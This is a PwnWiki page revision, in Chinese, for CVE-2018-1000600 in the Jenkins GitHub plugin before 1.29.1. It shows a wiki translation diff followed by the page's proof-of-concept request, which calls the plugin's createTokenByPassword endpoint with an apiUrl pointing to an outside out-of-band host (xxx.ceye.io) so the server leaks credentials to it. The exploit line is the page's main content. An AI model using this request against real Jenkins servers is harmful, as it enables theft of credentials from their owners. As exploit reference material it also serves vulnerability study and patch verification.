Difference between revisions of "CVE-2018-1000600 Jenkins GitHub 信息泄漏"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== Jenkins GitHub插件小於1.29.1 利用的POC如下,其中user1為用戶名。 </translate> <pre> /securityRealm/user/user1/de...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
Jenkins GitHub插件小於1.29.1 | Jenkins GitHub插件小於1.29.1 | ||
| + | <!--T:2--> | ||
利用的POC如下,其中user1為用戶名。 | 利用的POC如下,其中user1為用戶名。 | ||
</translate> | </translate> | ||
Latest revision as of 16:13, 9 March 2021
影響版本
Jenkins GitHub插件小於1.29.1
利用的POC如下,其中user1為用戶名。
/securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://xxx.ceye.io
